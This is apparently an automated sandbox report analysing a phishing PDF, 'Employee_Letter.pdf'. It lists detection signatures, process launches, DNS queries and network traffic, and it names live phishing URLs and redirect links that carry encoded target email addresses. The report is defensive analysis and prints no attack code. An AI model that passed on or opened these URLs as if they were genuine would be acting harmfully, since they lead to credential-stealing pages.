Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Employee_Letter.pdf

Overview

General Information

Sample name:Employee_Letter.pdf
Analysis ID:1573285
MD5:44a0a52720ef3d6c7aae78758c98b9d7
SHA1:1955681f6572315679c5a8978e70d2c0c6418afb
SHA256:cc4ca2625ffa997aa21dfe6e0434409bed703a05f02abb7762e70fbcd80c9a17
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish78
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 5896 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Letter.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6792 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6336 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2252 --field-trial-handle=1576,i,2502612492865038377,9197064398620487486,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 812 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.eu.sparkpostmail1.com/f/a/TeZdKDVSihVahrYyiCrP-Q~~/AAGCxAA~/RgRpNb0OP0QjaHR0cHM6Ly9sb3RhZG1pbi5pbi9kdWUvY2lnYW0vaW5kZXhXBXNwY2V1QgpnRA44U2evTxxnUhJ6YXJnYXJAZmFyaWRlYS5jb21YBAAAAAE~#amxpdUBiaW9sZWdlbmQuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1996,i,4593512500588078647,14419463124056601436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_500JoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
    SourceRuleDescriptionAuthorStrings
    1.1..script.csvJoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://lotadmin.in/due/cigam/index#amxpdUBiaW9sZWdlbmQuY29tJoe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'lotadmin.in' does not match the legitimate domain for Microsoft., The URL 'lotadmin.in' does not contain any recognizable association with Microsoft., The domain 'lotadmin.in' is not a known Microsoft domain or subdomain., The use of a completely different domain name is a common tactic in phishing attempts. DOM: 1.0.pages.csv
      Source: Yara matchFile source: 1.1..script.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_500, type: DROPPED
      Source: PDF documentJoe Sandbox AI: PDF document contains QR code
      Source: https://lotadmin.in/due/cigam/index#amxpdUBiaW9sZWdlbmQuY29tJoe Sandbox AI: Page contains button: 'Slide to verify' Source: '1.0.pages.csv'
      Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://lotadmin.in/due/cigam/index#amxpdUBiaW9sZW... The script uses obfuscated code with base64 encoding and XOR decryption, which is a high-risk indicator (+3 points). It also performs aggressive DOM manipulation by writing directly to the document with `document.write`, which can be a vector for injecting malicious content (+2 points). The use of a hardcoded key for decryption suggests potential malicious intent, as it could be used to hide harmful payloads. No context is provided to suggest a legitimate use case, so no points are subtracted.
      Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ust.tolegtynl.ru/Lhkb/#amxpdUBiaW9sZWdlbmQ... The script sends data to an obfuscated and suspicious domain (+3 points for obfuscated URL, +2 points for external data transmission). It also uses aggressive DOM manipulation by preventing form submission (+2 points). The domain 'ezmbsgzm.ru' appears suspicious, adding an additional point. The script redirects to 'azure.com', a trusted domain, but the overall behavior is inconsistent and potentially malicious.
      Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://www.larkus.ao/animal/script.js... The script contains obfuscated code, which is a high-risk indicator (+3 points). It also appears to be executing dynamic code, as suggested by the encoded script string, which is another high-risk indicator (+3 points). The lack of transparency and potential for data exfiltration or malicious redirection adds to the risk. Without further context or domain information, the script's behavior is suspicious, leading to a high-risk score.
      Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ust.tolegtynl.ru/Lhkb/#amxpdUBiaW9sZWdlbmQ... The script contains obfuscated code using base64 encoding, which is a high-risk indicator (+3 points). It also includes aggressive DOM manipulation and event listeners, which are moderate-risk indicators (+2 points). The script attempts to redirect the user based on certain conditions, which can be suspicious (+3 points). The domain '0vX0.tolegtynl.ru' is not a well-known or trusted domain, adding to the suspicion (+1 point). Overall, the script demonstrates behaviors consistent with potentially malicious intent.
      Source: https://lotadmin.in/due/cigam/index#amxpdUBiaW9sZWdlbmQuY29tHTTP Parser: Base64 decoded: OD'=& 25<SJaYRDQP[~W]xETKEEEOG!?#TKG]xETKEEENGGCXADF^E_NTMBGJaEYSE_G:R(YVJaEYSE_E^PVK^PIJLWK[JDNJU...
      Source: https://lotadmin.in/due/cigam/index#amxpdUBiaW9sZWdlbmQuY29tHTTP Parser: No favicon
      Source: https://lotadmin.in/due/cigam/index#amxpdUBiaW9sZWdlbmQuY29tHTTP Parser: No favicon
      Source: https://ust.tolegtynl.ru/Lhkb/#amxpdUBiaW9sZWdlbmQuY29tHTTP Parser: No favicon
      Source: https://ust.tolegtynl.ru/Lhkb/#amxpdUBiaW9sZWdlbmQuY29tHTTP Parser: No favicon
      Source: https://azure.microsoft.com/en-us/HTTP Parser: No favicon
      Source: https://azure.microsoft.com/en-us/HTTP Parser: No favicon
      Source: https://azure.microsoft.com/en-us/HTTP Parser: No favicon
      Source: https://azure.microsoft.com/en-us/HTTP Parser: No favicon
      Source: https://azure.microsoft.com/en-us/HTTP Parser: No favicon
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49770 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 0MB later: 29MB
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.177.147
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.177.147
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.177.147
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.177.147
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: global trafficDNS traffic detected: DNS query: go.eu.sparkpostmail1.com
      Source: global trafficDNS traffic detected: DNS query: lotadmin.in
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.larkus.ao
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
      Source: global trafficDNS traffic detected: DNS query: ipapi.co
      Source: global trafficDNS traffic detected: DNS query: ust.tolegtynl.ru
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: dg4e0fvznfp7w5yucsbzdksjv3y888lrfbjbdblxtexjwvwzu64zjtf5v8.ezmbsgzm.ru
      Source: global trafficDNS traffic detected: DNS query: www.azure.com
      Source: global trafficDNS traffic detected: DNS query: s.go-mpulse.net
      Source: global trafficDNS traffic detected: DNS query: cdn.botframework.com
      Source: global trafficDNS traffic detected: DNS query: play.vidyard.com
      Source: global trafficDNS traffic detected: DNS query: c.go-mpulse.net
      Source: global trafficDNS traffic detected: DNS query: publisher.liveperson.net
      Source: global trafficDNS traffic detected: DNS query: lpcdn.lpsnmedia.net
      Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
      Source: global trafficDNS traffic detected: DNS query: lptag.liveperson.net
      Source: global trafficDNS traffic detected: DNS query: accdn.lpsnmedia.net
      Source: global trafficDNS traffic detected: DNS query: static-assets.fs.liveperson.com
      Source: global trafficDNS traffic detected: DNS query: assets.adobedtm.com
      Source: global trafficDNS traffic detected: DNS query: va.v.liveperson.net
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49770 version: TLS 1.2
      Source: classification engineClassification label: mal64.phis.winPDF@40/204@99/303
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-11 13-12-07-256.log
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Letter.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.eu.sparkpostmail1.com/f/a/TeZdKDVSihVahrYyiCrP-Q~~/AAGCxAA~/RgRpNb0OP0QjaHR0cHM6Ly9sb3RhZG1pbi5pbi9kdWUvY2lnYW0vaW5kZXhXBXNwY2V1QgpnRA44U2evTxxnUhJ6YXJnYXJAZmFyaWRlYS5jb21YBAAAAAE~#amxpdUBiaW9sZWdlbmQuY29t
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2252 --field-trial-handle=1576,i,2502612492865038377,9197064398620487486,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1996,i,4593512500588078647,14419463124056601436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 36CC58043C1548A0270C415BA7DF6E92
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2252 --field-trial-handle=1576,i,2502612492865038377,9197064398620487486,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1996,i,4593512500588078647,14419463124056601436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
